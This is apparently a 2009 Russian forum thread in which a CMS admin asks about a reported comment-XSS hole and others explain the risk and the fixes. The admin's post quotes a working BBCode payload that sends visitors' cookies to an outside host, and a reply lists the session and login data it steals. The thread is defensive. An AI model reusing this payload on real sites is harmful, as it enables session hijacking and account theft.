Вы не зашли.
Мне тут сообщили что в движке есть дырка и прислали код
[url=javascript:location.replace("http://bestwebart.ru/a.php?"+document.cookie)]Мессага[/url]
Как я поинмаю эта штука ворует кукисы. верно? На сколько это опасно и как это исправить? Чем для меня как админа может вылиться переход по этой ссылке?
Изменено Luca (2009-06-11 20:12:17)
Не в сети
1. В 0.9.0 Release действительно были свои активные XSS уязвимости, в комментариях, в SVN версии уже закрыты.
2. Если у тебя стоит "Автоурезание слов в комментариях" = 50, то код порежется и не обработается парсером.
3. В 0.9.0 Release, если ты перешёл по ссылке, то тебе лучше всего сменить пароль, т.к. ты в таком случае потенциально уязвим.
Скрипту отправляется инфа: PHPSESSID=сессия; zz_auth=cookie; com_username=логин; com_usermail=e-mail
Т.е. фактически можно расшифровать по cookie твой пароль.
P.S. Это называется php sniffer.
Изменено infinity237 (2009-06-11 20:38:49)
Не в сети
Пароль расшифровать нельзя
o_O
Можно объяснить почему это нельзя?
Не в сети
Прошу прощения, действительно был не прав...
Всё сделано по-хитрожопому... )
Не в сети
А что дает автоурезание слов? Оно кукисы на выходе порежет? Просто в CMS есть баг из-за которого длинные ссылки дать нельзя -они урезаются "урезателем длинных слов", так что приходится ставить максимальную длинну слова в несколько сотен символов.
Не в сети
автоурезание как раз и не даёт таким ссылкам пройти...
Не в сети
А что дает автоурезание слов? Оно кукисы на выходе порежет? Просто в CMS есть баг из-за которого длинные ссылки дать нельзя -они урезаются "урезателем длинных слов", так что приходится ставить максимальную длинну слова в несколько сотен символов.
Лучше на 20 поставить, ссылочки в комментариях не так важны, как безопасность. При желании можно и поудалять пробельчики, если нужно перейти по ссылке
Не в сети